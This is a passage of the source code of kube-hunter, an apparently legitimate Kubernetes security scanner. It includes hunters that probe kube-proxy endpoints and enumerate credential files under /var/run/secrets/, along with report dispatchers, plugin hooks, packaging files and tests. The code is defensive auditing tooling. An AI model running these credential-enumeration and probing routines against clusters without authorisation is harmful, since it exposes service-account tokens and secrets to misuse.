101 | self.event.evidence = "build date: {}".format(version_metadata["buildDate"])
102 |
103 |
104 | @handler.subscribe(KubeProxyExposed)
105 | class K8sVersionDisclosureProve(ActiveHunter):
106 | """K8s Version Hunter
107 | Hunts Proxy when exposed, extracts the version
108 | """
109 |
110 | def __init__(self, event):
111 | self.event = event
112 |
113 | def execute(self):
114 | config = get_config()
115 | version_metadata = requests.get(
116 | f"http://{self.event.host}:{self.event.port}/version",
117 | verify=False,
118 | timeout=config.network_timeout,
119 | ).json()
120 | if "gitVersion" in version_metadata:
121 | self.publish_event(
122 | K8sVersionDisclosure(
123 | version=version_metadata["gitVersion"],
124 | from_endpoint="/version",
125 | extra_info="on kube-proxy",
126 | category=ConnectFromProxyServerTechnique,
127 | )
128 | )
129 |
--------------------------------------------------------------------------------
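
The namespaces and services properties boil down to walking the REST hierarchy exposed through the proxy: /api/v1/namespaces, then /api/v1/namespaces/{name}/services. A compressed sketch against a local kubectl proxy (the address is an assumption):

import requests

api_url = "http://127.0.0.1:8001/api/v1"  # e.g. a local `kubectl proxy`
timeout = 5

namespaces = [item["metadata"]["name"]
              for item in requests.get(f"{api_url}/namespaces", timeout=timeout).json()["items"]]
for namespace in namespaces:
    services = requests.get(f"{api_url}/namespaces/{namespace}/services", timeout=timeout).json()
    print(namespace, [item["metadata"]["name"] for item in services["items"]])
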
/kube_hunter/modules/hunting/secrets.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import os
3 |
4 | from kube_hunter.core.events.event_handler import handler
5 | from kube_hunter.core.events.types import Vulnerability, Event
6 | from kube_hunter.core.types import Hunter, KubernetesCluster, AccessContainerServiceAccountTechnique
7 | from kube_hunter.modules.discovery.hosts import RunningAsPodEvent
8 |
9 | logger = logging.getLogger(__name__)
10 |
11 |
12 | class ServiceAccountTokenAccess(Vulnerability, Event):
13 |     """Accessing the pod's service account token gives an attacker the option to use the Kubernetes API server"""
14 |
15 | def __init__(self, evidence):
16 | Vulnerability.__init__(
17 | self,
18 | KubernetesCluster,
19 | name="Read access to pod's service account token",
20 | category=AccessContainerServiceAccountTechnique,
21 | vid="KHV050",
22 | )
23 | self.evidence = evidence
24 |
25 |
26 | class SecretsAccess(Vulnerability, Event):
27 | """Accessing the pod's secrets within a compromised pod might disclose valuable data to a potential attacker"""
28 |
29 | def __init__(self, evidence):
30 | Vulnerability.__init__(
31 | self,
32 | component=KubernetesCluster,
33 | name="Access to pod's secrets",
34 | category=AccessContainerServiceAccountTechnique,
35 | )
36 | self.evidence = evidence
37 |
38 |
39 | # Passive Hunter
40 | @handler.subscribe(RunningAsPodEvent)
41 | class AccessSecrets(Hunter):
42 | """Access Secrets
43 | Accessing the secrets accessible to the pod"""
44 |
45 | def __init__(self, event):
46 | self.event = event
47 | self.secrets_evidence = ""
48 |
49 |     def get_secrets(self):
50 |         logger.debug("Trying to access pod's secrets directory")
51 |         # collect all files, including those in subdirectories:
52 | self.secrets_evidence = []
53 | for dirname, _, files in os.walk("/var/run/secrets/"):
54 | for f in files:
55 | self.secrets_evidence.append(os.path.join(dirname, f))
56 | return len(self.secrets_evidence) > 0
57 |
58 | def execute(self):
59 | if self.event.auth_token is not None:
60 | self.publish_event(ServiceAccountTokenAccess(self.event.auth_token))
61 |         if self.get_secrets():
62 | self.publish_event(SecretsAccess(self.secrets_evidence))
63 |
--------------------------------------------------------------------------------
/kube_hunter/modules/report/__init__.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from kube_hunter.modules.report.factory import get_reporter, get_dispatcher
3 |
--------------------------------------------------------------------------------
/kube_hunter/modules/report/base.py:
--------------------------------------------------------------------------------
1 | from kube_hunter.core.types import Discovery
2 | from kube_hunter.modules.report.collector import (
3 | services,
4 | vulnerabilities,
5 | hunters,
6 | services_lock,
7 | vulnerabilities_lock,
8 | )
9 |
10 | BASE_KB_LINK = "https://avd.aquasec.com/"
11 | FULL_KB_LINK = "https://avd.aquasec.com/kube-hunter/{vid}/"
12 |
13 |
14 | class BaseReporter:
15 | def get_nodes(self):
16 | nodes = list()
17 | node_locations = set()
18 | with services_lock:
19 | for service in services:
20 | node_location = str(service.host)
21 | if node_location not in node_locations:
22 | nodes.append({"type": "Node/Master", "location": node_location})
23 | node_locations.add(node_location)
24 | return nodes
25 |
26 | def get_services(self):
27 | with services_lock:
28 | return [
29 | {"service": service.get_name(), "location": f"{service.host}:{service.port}{service.get_path()}"}
30 | for service in services
31 | ]
32 |
33 | def get_vulnerabilities(self):
34 | with vulnerabilities_lock:
35 | return [
36 | {
37 | "location": vuln.location(),
38 | "vid": vuln.get_vid(),
39 | "category": vuln.category.get_name(),
40 | "severity": vuln.get_severity(),
41 | "vulnerability": vuln.get_name(),
42 | "description": vuln.explain(),
43 | "evidence": str(vuln.evidence),
44 | "avd_reference": FULL_KB_LINK.format(vid=vuln.get_vid().lower()),
45 | "hunter": vuln.hunter.get_name(),
46 | }
47 | for vuln in vulnerabilities
48 | ]
49 |
50 | def get_hunter_statistics(self):
51 | hunters_data = []
52 | for hunter, docs in hunters.items():
53 | if Discovery not in hunter.__mro__:
54 | name, doc = hunter.parse_docs(docs)
55 | hunters_data.append(
56 | {"name": name, "description": doc, "vulnerabilities": hunter.publishedVulnerabilities}
57 | )
58 | return hunters_data
59 |
60 | def get_report(self, *, statistics, **kwargs):
61 | report = {
62 | "nodes": self.get_nodes(),
63 | "services": self.get_services(),
64 | "vulnerabilities": self.get_vulnerabilities(),
65 | }
66 |
67 | if statistics:
68 | report["hunter_statistics"] = self.get_hunter_statistics()
69 |
70 | return report
71 |
--------------------------------------------------------------------------------
/kube_hunter/modules/report/collector.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import threading
3 |
4 | from kube_hunter.conf import get_config
5 | from kube_hunter.core.events.event_handler import handler
6 | from kube_hunter.core.events.types import (
7 | Event,
8 | Service,
9 | Vulnerability,
10 | HuntFinished,
11 | HuntStarted,
12 | ReportDispatched,
13 | )
14 |
15 | logger = logging.getLogger(__name__)
16 |
17 | services_lock = threading.Lock()
18 | services = list()
19 | vulnerabilities_lock = threading.Lock()
20 | vulnerabilities = list()
21 | hunters = handler.all_hunters
22 |
23 |
24 | @handler.subscribe(Service)
25 | @handler.subscribe(Vulnerability)
26 | class Collector:
27 | def __init__(self, event=None):
28 | self.event = event
29 |
30 | def execute(self):
31 | """function is called only when collecting data"""
32 | global services
33 | global vulnerabilities
34 | bases = self.event.__class__.__mro__
35 | if Service in bases:
36 | with services_lock:
37 | services.append(self.event)
38 | logger.info(f'Found open service "{self.event.get_name()}" at {self.event.location()}')
39 | elif Vulnerability in bases:
40 | with vulnerabilities_lock:
41 | vulnerabilities.append(self.event)
42 | logger.info(f'Found vulnerability "{self.event.get_name()}" in {self.event.location()}')
43 |
44 |
45 | class TablesPrinted(Event):
46 | pass
47 |
48 |
49 | @handler.subscribe(HuntFinished)
50 | class SendFullReport:
51 | def __init__(self, event):
52 | self.event = event
53 |
54 | def execute(self):
55 | config = get_config()
56 | report = config.reporter.get_report(statistics=config.statistics, mapping=config.mapping)
57 | config.dispatcher.dispatch(report)
58 | handler.publish_event(ReportDispatched())
59 | handler.publish_event(TablesPrinted())
60 |
61 |
62 | @handler.subscribe(HuntStarted)
63 | class StartedInfo:
64 | def __init__(self, event):
65 | self.event = event
66 |
67 | def execute(self):
68 | logger.info("Started hunting")
69 | logger.info("Discovering Open Kubernetes Services")
70 |
--------------------------------------------------------------------------------
/kube_hunter/modules/report/dispatchers.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import os
3 | import requests
4 |
5 | logger = logging.getLogger(__name__)
6 |
7 |
8 | class HTTPDispatcher:
9 | def dispatch(self, report):
10 | logger.debug("Dispatching report via HTTP")
11 | dispatch_method = os.environ.get("KUBEHUNTER_HTTP_DISPATCH_METHOD", "POST").upper()
12 | dispatch_url = os.environ.get("KUBEHUNTER_HTTP_DISPATCH_URL", "https://localhost/")
13 | try:
14 | r = requests.request(
15 | dispatch_method, dispatch_url, json=report, headers={"Content-Type": "application/json"}, verify=False
16 | )
17 | r.raise_for_status()
18 | logger.info(f"Report was dispatched to: {dispatch_url}")
19 | logger.debug(f"Dispatch responded {r.status_code} with: {r.text}")
20 |
21 | except requests.HTTPError:
22 | logger.exception(f"Failed making HTTP {dispatch_method} to {dispatch_url}, " f"status code {r.status_code}")
23 | except Exception:
24 | logger.exception(f"Could not dispatch report to {dispatch_url}")
25 |
26 |
27 | class STDOUTDispatcher:
28 | def dispatch(self, report):
29 | logger.debug("Dispatching report via stdout")
30 | print(report)
31 |
--------------------------------------------------------------------------------
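
HTTPDispatcher reads its method and target URL from the environment at dispatch time, so configuring it is just setting two variables before a report is sent. An illustrative sketch (the URL is an assumption; failures are logged rather than raised, as in the dispatcher above):

import os

os.environ["KUBEHUNTER_HTTP_DISPATCH_METHOD"] = "PUT"
os.environ["KUBEHUNTER_HTTP_DISPATCH_URL"] = "https://reports.example.com/kube-hunter"

from kube_hunter.modules.report.dispatchers import HTTPDispatcher

HTTPDispatcher().dispatch({"nodes": [], "services": [], "vulnerabilities": []})
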
/kube_hunter/modules/report/factory.py:
--------------------------------------------------------------------------------
1 | import logging
2 |
3 | from kube_hunter.modules.report.json import JSONReporter
4 | from kube_hunter.modules.report.yaml import YAMLReporter
5 | from kube_hunter.modules.report.plain import PlainReporter
6 | from kube_hunter.modules.report.dispatchers import STDOUTDispatcher, HTTPDispatcher
7 |
8 | logger = logging.getLogger(__name__)
9 |
10 | DEFAULT_REPORTER = "plain"
11 | reporters = {
12 | "yaml": YAMLReporter,
13 | "json": JSONReporter,
14 | "plain": PlainReporter,
15 | }
16 |
17 | DEFAULT_DISPATCHER = "stdout"
18 | dispatchers = {
19 | "stdout": STDOUTDispatcher,
20 | "http": HTTPDispatcher,
21 | }
22 |
23 |
24 | def get_reporter(name):
25 | try:
26 | return reporters[name.lower()]()
27 | except KeyError:
28 |         logger.warning(f'Unknown reporter "{name}", using {DEFAULT_REPORTER}')
29 | return reporters[DEFAULT_REPORTER]()
30 |
31 |
32 | def get_dispatcher(name):
33 | try:
34 | return dispatchers[name.lower()]()
35 | except KeyError:
36 | logger.warning(f'Unknown dispatcher "{name}", using {DEFAULT_DISPATCHER}')
37 | return dispatchers[DEFAULT_DISPATCHER]()
38 |
--------------------------------------------------------------------------------
/kube_hunter/modules/report/json.py:
--------------------------------------------------------------------------------
1 | import json
2 |
3 | from kube_hunter.modules.report.base import BaseReporter
4 |
5 |
6 | class JSONReporter(BaseReporter):
7 | def get_report(self, **kwargs):
8 | report = super().get_report(**kwargs)
9 | return json.dumps(report)
10 |
--------------------------------------------------------------------------------
/kube_hunter/modules/report/plain.py:
--------------------------------------------------------------------------------
1 | from prettytable import ALL, PrettyTable
2 |
3 | from kube_hunter.modules.report.base import BaseReporter, BASE_KB_LINK
4 | from kube_hunter.modules.report.collector import (
5 | services,
6 | vulnerabilities,
7 | hunters,
8 | services_lock,
9 | vulnerabilities_lock,
10 | )
11 |
12 | EVIDENCE_PREVIEW = 100
13 | MAX_TABLE_WIDTH = 20
14 |
15 |
16 | class PlainReporter(BaseReporter):
17 | def get_report(self, *, statistics=None, mapping=None, **kwargs):
18 | """generates report tables"""
19 | output = ""
20 |
21 | with vulnerabilities_lock:
22 | vulnerabilities_len = len(vulnerabilities)
23 |
24 | hunters_len = len(hunters.items())
25 |
26 | with services_lock:
27 | services_len = len(services)
28 |
29 | if services_len:
30 | output += self.nodes_table()
31 | if not mapping:
32 | output += self.services_table()
33 | if vulnerabilities_len:
34 | output += self.vulns_table()
35 | else:
36 | output += "\nNo vulnerabilities were found"
37 | if statistics:
38 | if hunters_len:
39 | output += self.hunters_table()
40 | else:
41 | output += "\nNo hunters were found"
42 | else:
43 | if vulnerabilities_len:
44 | output += self.vulns_table()
45 | output += "\nKube Hunter couldn't find any clusters"
46 | return output
47 |
48 | def nodes_table(self):
49 | nodes_table = PrettyTable(["Type", "Location"], hrules=ALL)
50 | nodes_table.align = "l"
51 | nodes_table.max_width = MAX_TABLE_WIDTH
52 | nodes_table.padding_width = 1
53 | nodes_table.sortby = "Type"
54 | nodes_table.reversesort = True
55 | nodes_table.header_style = "upper"
56 | id_memory = set()
57 | services_lock.acquire()
58 | for service in services:
59 | if service.event_id not in id_memory:
60 | nodes_table.add_row(["Node/Master", service.host])
61 | id_memory.add(service.event_id)
62 | nodes_ret = f"\nNodes\n{nodes_table}\n"
63 | services_lock.release()
64 | return nodes_ret
65 |
66 | def services_table(self):
67 | services_table = PrettyTable(["Service", "Location", "Description"], hrules=ALL)
68 | services_table.align = "l"
69 | services_table.max_width = MAX_TABLE_WIDTH
70 | services_table.padding_width = 1
71 | services_table.sortby = "Service"
72 | services_table.reversesort = True
73 | services_table.header_style = "upper"
74 | with services_lock:
75 | for service in services:
76 | services_table.add_row(
77 | [service.get_name(), f"{service.host}:{service.port}{service.get_path()}", service.explain()]
78 | )
79 | detected_services_ret = f"\nDetected Services\n{services_table}\n"
80 | return detected_services_ret
81 |
82 | def vulns_table(self):
83 | column_names = [
84 | "ID",
85 | "Location",
86 | "MITRE Category",
87 | "Vulnerability",
88 | "Description",
89 | "Evidence",
90 | ]
91 | vuln_table = PrettyTable(column_names, hrules=ALL)
92 | vuln_table.align = "l"
93 | vuln_table.max_width = MAX_TABLE_WIDTH
94 | vuln_table.sortby = "MITRE Category"
95 | vuln_table.reversesort = True
96 | vuln_table.padding_width = 1
97 | vuln_table.header_style = "upper"
98 |
99 | with vulnerabilities_lock:
100 | for vuln in vulnerabilities:
101 | evidence = str(vuln.evidence)
102 | if len(evidence) > EVIDENCE_PREVIEW:
103 | evidence = evidence[:EVIDENCE_PREVIEW] + "..."
104 |
105 | row = [
106 | vuln.get_vid(),
107 | vuln.location(),
108 | vuln.category.get_name(),
109 | vuln.get_name(),
110 | vuln.explain(),
111 | evidence,
112 | ]
113 | vuln_table.add_row(row)
114 | return (
115 | "\nVulnerabilities\n"
116 | "For further information about a vulnerability, search its ID in: \n"
117 | f"{BASE_KB_LINK}\n{vuln_table}\n"
118 | )
119 |
120 | def hunters_table(self):
121 | column_names = ["Name", "Description", "Vulnerabilities"]
122 | hunters_table = PrettyTable(column_names, hrules=ALL)
123 | hunters_table.align = "l"
124 | hunters_table.max_width = MAX_TABLE_WIDTH
125 | hunters_table.sortby = "Name"
126 | hunters_table.reversesort = True
127 | hunters_table.padding_width = 1
128 | hunters_table.header_style = "upper"
129 |
130 | hunter_statistics = self.get_hunter_statistics()
131 | for item in hunter_statistics:
132 | hunters_table.add_row([item.get("name"), item.get("description"), item.get("vulnerabilities")])
133 | return f"\nHunter Statistics\n{hunters_table}\n"
134 |
--------------------------------------------------------------------------------
/kube_hunter/modules/report/yaml.py:
--------------------------------------------------------------------------------
1 | from io import StringIO
2 | from ruamel.yaml import YAML
3 |
4 | from kube_hunter.modules.report.base import BaseReporter
5 |
6 |
7 | class YAMLReporter(BaseReporter):
8 | def get_report(self, **kwargs):
9 | report = super().get_report(**kwargs)
10 | output = StringIO()
11 | yaml = YAML()
12 | yaml.dump(report, output)
13 | return output.getvalue()
14 |
--------------------------------------------------------------------------------
/kube_hunter/plugins/__init__.py:
--------------------------------------------------------------------------------
1 | import pluggy
2 |
3 | from kube_hunter.plugins import hookspecs
4 |
5 | hookimpl = pluggy.HookimplMarker("kube-hunter")
6 |
7 |
8 | def initialize_plugin_manager():
9 | """
10 |     Initializes the plugin manager and loads all default and setuptools-registered plugin implementations
11 |
12 | @return: initialized plugin manager
13 | """
14 | pm = pluggy.PluginManager("kube-hunter")
15 | pm.add_hookspecs(hookspecs)
16 | pm.load_setuptools_entrypoints("kube_hunter")
17 |
18 | # default registration of builtin implemented plugins
19 | from kube_hunter.conf import parser
20 |
21 | pm.register(parser)
22 |
23 | return pm
24 |
--------------------------------------------------------------------------------
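Because initialize_plugin_manager calls pm.load_setuptools_entrypoints("kube_hunter"), any installed distribution that exposes a "kube_hunter" entry point is registered automatically, just like the builtin parser module above. A hypothetical third-party plugin could declare itself in its own setup.cfg like this (the package and module names are illustrative):

    [options.entry_points]
    kube_hunter =
        my_plugin = my_plugin.hooks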
/kube_hunter/plugins/hookspecs.py:
--------------------------------------------------------------------------------
1 | import pluggy
2 | from argparse import ArgumentParser
3 |
4 | hookspec = pluggy.HookspecMarker("kube-hunter")
5 |
6 |
7 | @hookspec
8 | def parser_add_arguments(parser: ArgumentParser):
9 | """Add arguments to the ArgumentParser.
10 |
11 |     If a plugin requires an additional argument, it should implement this hook
12 |     and add the argument to the ArgumentParser.
13 |
14 |     @param parser: an ArgumentParser on which to call parser.add_argument
15 | """
16 |
17 |
18 | @hookspec
19 | def load_plugin(args):
20 | """Plugins that wish to execute code after the argument parsing
21 | should implement this hook.
22 |
23 | @param args: all parsed arguments passed to kube-hunter
24 | """
25 |
--------------------------------------------------------------------------------
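A minimal sketch of a plugin module implementing both hookspecs above; the flag name and the action taken are illustrative, not part of kube-hunter:

    from kube_hunter.plugins import hookimpl

    @hookimpl
    def parser_add_arguments(parser):
        # contribute an extra CLI flag (hypothetical name)
        parser.add_argument("--my-plugin-flag", action="store_true", help="enable my plugin")

    @hookimpl
    def load_plugin(args):
        # runs after argument parsing; args holds all parsed arguments
        if args.my_plugin_flag:
            print("my plugin enabled")

Registering such a module (directly via pm.register, or through a "kube_hunter" entry point) makes both hooks fire alongside the builtin implementations.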
/mypy.ini:
--------------------------------------------------------------------------------
1 | [mypy]
2 | ignore_missing_imports = True
--------------------------------------------------------------------------------
/pyinstaller_hooks/hook-prettytable.py:
--------------------------------------------------------------------------------
1 | from PyInstaller.utils.hooks import collect_all
2 |
3 | datas, binaries, hiddenimports = collect_all("prettytable")  # bundle prettytable's data files, binaries, and submodules
4 |
--------------------------------------------------------------------------------
/pyproject.toml:
--------------------------------------------------------------------------------
1 | [tool.black]
2 | line-length = 120
3 | target-version = ['py36']
4 | include = '\.pyi?$'
5 | exclude = '''
6 | (
7 | \.eggs
8 | | \.git
9 | | \.hg
10 | | \.mypy_cache
11 | | \.tox
12 |   | venv
13 | | \.venv
14 | | _build
15 | | buck-out
16 | | build
17 | | dist
18 | | \.vscode
19 | | \.idea
20 | | \.Python
21 | | develop-eggs
22 | | downloads
23 | | eggs
24 | | lib
25 | | lib64
26 | | parts
27 | | sdist
28 | | var
29 | | .*\.egg-info
30 | | \.DS_Store
31 | )
32 | '''
33 |
--------------------------------------------------------------------------------
/requirements-dev.txt:
--------------------------------------------------------------------------------
1 | flake8
2 | pytest >= 2.9.1
3 | requests-mock >= 1.8
4 | coverage < 5.0
5 | pytest-cov
6 | setuptools >= 30.3.0
7 | setuptools_scm
8 | twine
9 | pyinstaller
10 | staticx
11 | black
12 | pre-commit
13 | flake8-bugbear
14 | flake8-mypy
15 | pluggy
16 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | -e .
2 |
--------------------------------------------------------------------------------
/setup.cfg:
--------------------------------------------------------------------------------
1 | [metadata]
2 | name = kube-hunter
3 | description = Kubernetes security weaknesses hunter for humans
4 | long_description = file: README.md
5 | long_description_content_type = text/markdown
6 | author = Aqua Security
7 | author_email = support@aquasec.com
8 | url = https://github.com/aquasecurity/kube-hunter
9 | keywords =
10 | aquasec
11 | hunter
12 | kubernetes
13 | k8s
14 | security
15 | license_file = LICENSE
16 | classifiers =
17 | Development Status :: 4 - Beta
18 | Environment :: Console
19 | License :: OSI Approved :: Apache Software License
20 | Natural Language :: English
21 | Operating System :: OS Independent
22 | Programming Language :: Python :: 3.6
23 | Programming Language :: Python :: 3.7
24 | Programming Language :: Python :: 3.8
25 | Programming Language :: Python :: 3.9
26 | Programming Language :: Python :: 3 :: Only
27 | Topic :: Security
28 |
29 | [options]
30 | zip_safe = False
31 | packages = find:
32 | install_requires =
33 | netaddr
34 | pyroute2
35 | requests
36 | PrettyTable
37 | urllib3>=1.24.3
38 | ruamel.yaml
39 | future
40 | packaging
41 | dataclasses
42 | pluggy
43 | kubernetes==12.0.1
44 | setup_requires =
45 | setuptools>=30.3.0
46 | setuptools_scm
47 | test_requires =
48 | pytest>=2.9.1
49 | coverage<5.0
50 | pytest-cov
51 | requests-mock
52 | python_requires = >=3.6
53 |
54 | [options.entry_points]
55 | console_scripts =
56 | kube-hunter = kube_hunter.__main__:main
57 |
58 | [aliases]
59 | test=pytest
60 |
61 | # PyTest
62 | [tool:pytest]
63 | minversion = 2.9.1
64 | norecursedirs = .venv .vscode
65 | addopts = --cov=kube_hunter
66 | testpaths = tests
67 | console_output_style = progress
68 | python_classes = Test*
69 | python_files = test_*.py
70 | python_functions = test_*
71 | filterwarnings = ignore::DeprecationWarning
72 |
73 | # Coverage
74 | [coverage:report]
75 | # show missing line numbers
76 | show_missing = True
77 | # Regexes for lines to exclude from consideration
78 | exclude_lines =
79 | # Have to re-enable the standard pragma
80 | pragma: no cover
81 | # Don't complain about missing debug-only code:
82 | def __repr__
83 | if self\.debug
84 | # Don't complain if tests don't hit defensive
85 | # assertion code:
86 | raise AssertionError
87 | raise NotImplementedError
88 | # Don't complain if non-runnable code isn't run:
89 | if 0:
90 | if __name__ == .__main__.:
91 | # Don't complain about log messages not being tested
92 | logger\.
93 | logging\.
94 |
95 | # Files to exclude from consideration
96 | omit =
97 | kube_hunter/__main__.py
98 |
--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
1 | from configparser import ConfigParser
2 | from pkg_resources import parse_requirements
3 | from subprocess import check_call
4 | from typing import Any, List
5 | from setuptools import setup, Command
6 |
7 |
8 | class ListDependenciesCommand(Command):
9 | """A custom command to list dependencies"""
10 |
11 | description = "list package dependencies"
12 | user_options: List[Any] = []
13 |
14 | def initialize_options(self):
15 | pass
16 |
17 | def finalize_options(self):
18 | pass
19 |
20 | def run(self):
21 | cfg = ConfigParser()
22 | cfg.read("setup.cfg")
23 | requirements = cfg["options"]["install_requires"]
24 | print(requirements)
25 |
26 |
27 | class PyInstallerCommand(Command):
28 | """A custom command to run PyInstaller to build standalone executable."""
29 |
30 | description = "run PyInstaller on kube-hunter entrypoint"
31 | user_options: List[Any] = []
32 |
33 | def initialize_options(self):
34 | pass
35 |
36 | def finalize_options(self):
37 | pass
38 |
39 | def run(self):
40 | cfg = ConfigParser()
41 | cfg.read("setup.cfg")
42 | command = [
43 | "pyinstaller",
44 | "--additional-hooks-dir",
45 | "pyinstaller_hooks",
46 | "--clean",
47 | "--onefile",
48 | "--name",
49 | "kube-hunter",
50 | ]
51 | setup_cfg = cfg["options"]["install_requires"]
52 | requirements = parse_requirements(setup_cfg)
53 | for r in requirements:
54 | command.extend(["--hidden-import", r.key])
55 | command.append("kube_hunter/__main__.py")
56 | print(" ".join(command))
57 | check_call(command)
58 |
59 |
60 | setup(
61 | use_scm_version={"fallback_version": "noversion"},
62 | cmdclass={"dependencies": ListDependenciesCommand, "pyinstaller": PyInstallerCommand},
63 | )
64 |
--------------------------------------------------------------------------------
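The two custom commands registered in cmdclass above are invoked through setup.py, for example:

    # List the pinned runtime dependencies (reads install_requires from setup.cfg)
    python setup.py dependencies

    # Build a standalone executable, passing each dependency to PyInstaller as a hidden import
    python setup.py pyinstaller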
/tests/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aquasecurity/kube-hunter/bc47f08e88ea2a5fb059bf3b8a8edb1aefb4c6cc/tests/__init__.py
--------------------------------------------------------------------------------
/tests/conf/test_logging.py:
--------------------------------------------------------------------------------
1 | import logging
2 |
3 | from kube_hunter.conf.logging import setup_logger
4 |
5 |
6 | def test_setup_logger_level():
7 | test_cases = [
8 | ("INFO", logging.INFO),
9 | ("Debug", logging.DEBUG),
10 | ("critical", logging.CRITICAL),
11 | ("NOTEXISTS", logging.INFO),
12 | ("BASIC_FORMAT", logging.INFO),
13 | ]
14 | logFile = None
15 | for level, expected in test_cases:
16 | setup_logger(level, logFile)
17 | actual = logging.getLogger().getEffectiveLevel()
18 | assert actual == expected, f"{level} level should be {expected} (got {actual})"
19 |
20 |
21 | def test_setup_logger_none():
22 | setup_logger("NONE", None)
23 | assert logging.getLogger().manager.disable == logging.CRITICAL
24 |
--------------------------------------------------------------------------------
/tests/core/test_cloud.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | import requests_mock
3 | import json
4 |
5 | from kube_hunter.conf import Config, set_config
6 |
7 | set_config(Config())
8 |
9 | from kube_hunter.core.events.types import NewHostEvent
10 |
11 |
12 | def test_presetcloud():
13 | """Testing if it doesn't try to run get_cloud if the cloud type is already set.
14 | get_cloud(1.2.3.4) will result with an error
15 | """
16 |     expected = "AWS"
17 |     hostEvent = NewHostEvent(host="1.2.3.4", cloud=expected)
18 |     assert expected == hostEvent.cloud
19 |
20 |
21 | def test_getcloud():
22 | fake_host = "1.2.3.4"
23 | expected_cloud = "Azure"
24 | result = {"cloud": expected_cloud}
25 |
26 | with requests_mock.mock() as m:
27 | m.get(f"https://api.azurespeed.com/api/region?ipOrUrl={fake_host}", text=json.dumps(result))
28 | hostEvent = NewHostEvent(host=fake_host)
29 | assert hostEvent.cloud == expected_cloud
30 |
--------------------------------------------------------------------------------
/tests/core/test_handler.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 |
3 | from kube_hunter.conf import Config, set_config, get_config
4 |
5 | set_config(Config(active=True))
6 |
7 | from kube_hunter.core.events.event_handler import handler
8 | from kube_hunter.modules.discovery.apiserver import ApiServiceDiscovery
9 | from kube_hunter.modules.discovery.dashboard import KubeDashboard as KubeDashboardDiscovery
10 | from kube_hunter.modules.discovery.etcd import EtcdRemoteAccess as EtcdRemoteAccessDiscovery
11 | from kube_hunter.modules.discovery.hosts import FromPodHostDiscovery, HostDiscovery
12 | from kube_hunter.modules.discovery.kubectl import KubectlClientDiscovery
13 | from kube_hunter.modules.discovery.kubelet import KubeletDiscovery
14 | from kube_hunter.modules.discovery.ports import PortDiscovery
15 | from kube_hunter.modules.discovery.proxy import KubeProxy as KubeProxyDiscovery
16 | from kube_hunter.modules.hunting.aks import AzureSpnHunter, ProveAzureSpnExposure
17 | from kube_hunter.modules.hunting.apiserver import (
18 | AccessApiServer,
19 | ApiVersionHunter,
20 | AccessApiServerActive,
21 | AccessApiServerWithToken,
22 | )
23 | from kube_hunter.modules.hunting.capabilities import PodCapabilitiesHunter
24 | from kube_hunter.modules.hunting.certificates import CertificateDiscovery
25 |
26 | from kube_hunter.modules.hunting.cves import K8sClusterCveHunter
27 | from kube_hunter.modules.hunting.cves import KubectlCVEHunter
28 | from kube_hunter.modules.hunting.dashboard import KubeDashboard
29 | from kube_hunter.modules.hunting.etcd import EtcdRemoteAccess, EtcdRemoteAccessActive
30 | from kube_hunter.modules.hunting.kubelet import (
31 | ProveAnonymousAuth,
32 | MaliciousIntentViaSecureKubeletPort,
33 | ProveContainerLogsHandler,
34 | ProveRunHandler,
35 | ProveSystemLogs,
36 | ReadOnlyKubeletPortHunter,
37 | SecureKubeletPortHunter,
38 | )
39 | from kube_hunter.modules.hunting.mounts import VarLogMountHunter, ProveVarLogMount
40 | from kube_hunter.modules.hunting.proxy import KubeProxy, ProveProxyExposed, K8sVersionDisclosureProve
41 | from kube_hunter.modules.hunting.secrets import AccessSecrets
42 |
43 | config = get_config()
44 |
45 | PASSIVE_HUNTERS = {
46 | ApiServiceDiscovery,
47 | KubeDashboardDiscovery,
48 | EtcdRemoteAccessDiscovery,
49 | FromPodHostDiscovery,
50 | HostDiscovery,
51 | KubectlClientDiscovery,
52 | KubeletDiscovery,
53 | PortDiscovery,
54 | KubeProxyDiscovery,
55 | AzureSpnHunter,
56 | AccessApiServer,
57 | AccessApiServerWithToken,
58 | ApiVersionHunter,
59 | PodCapabilitiesHunter,
60 | CertificateDiscovery,
61 | KubectlCVEHunter,
62 | KubeDashboard,
63 | EtcdRemoteAccess,
64 | ReadOnlyKubeletPortHunter,
65 | SecureKubeletPortHunter,
66 | VarLogMountHunter,
67 | KubeProxy,
68 | AccessSecrets,
69 | }
70 |
71 | # if config.enable_cve_hunting:
72 | #     PASSIVE_HUNTERS.add(K8sClusterCveHunter)
73 |
74 | ACTIVE_HUNTERS = {
75 | ProveAzureSpnExposure,
76 | AccessApiServerActive,
77 | EtcdRemoteAccessActive,
78 | ProveRunHandler,
79 | ProveContainerLogsHandler,
80 | ProveSystemLogs,
81 | ProveVarLogMount,
82 | ProveProxyExposed,
83 | K8sVersionDisclosureProve,
84 | ProveAnonymousAuth,
85 | MaliciousIntentViaSecureKubeletPort,
86 | }
87 |
88 |
89 | def remove_test_hunters(hunters):
90 | return {hunter for hunter in hunters if not hunter.__module__.startswith("test")}
91 |
92 |
93 | def test_passive_hunters_registered():
94 | expected_missing = set()
95 | expected_odd = set()
96 |
97 | registered_passive = remove_test_hunters(handler.passive_hunters.keys())
98 | actual_missing = PASSIVE_HUNTERS - registered_passive
99 | actual_odd = registered_passive - PASSIVE_HUNTERS
100 |
101 | assert expected_missing == actual_missing, "Passive hunters are missing"
102 | assert expected_odd == actual_odd, "Unexpected passive hunters are registered"
103 |
104 |
105 | def test_active_hunters_registered():
106 | expected_missing = set()
107 | expected_odd = set()
108 |
109 | registered_active = remove_test_hunters(handler.active_hunters.keys())
110 | actual_missing = ACTIVE_HUNTERS - registered_active
111 | actual_odd = registered_active - ACTIVE_HUNTERS
112 |
113 | assert expected_missing == actual_missing, "Active hunters are missing"
114 | assert expected_odd == actual_odd, "Unexpected active hunters are registered"
115 |
116 |
117 | def test_all_hunters_registered():
118 | expected = PASSIVE_HUNTERS | ACTIVE_HUNTERS
119 | actual = remove_test_hunters(handler.all_hunters.keys())
120 |
121 | assert expected == actual
122 |
--------------------------------------------------------------------------------
/tests/core/test_subscribe.py:
--------------------------------------------------------------------------------
1 | import time
2 |
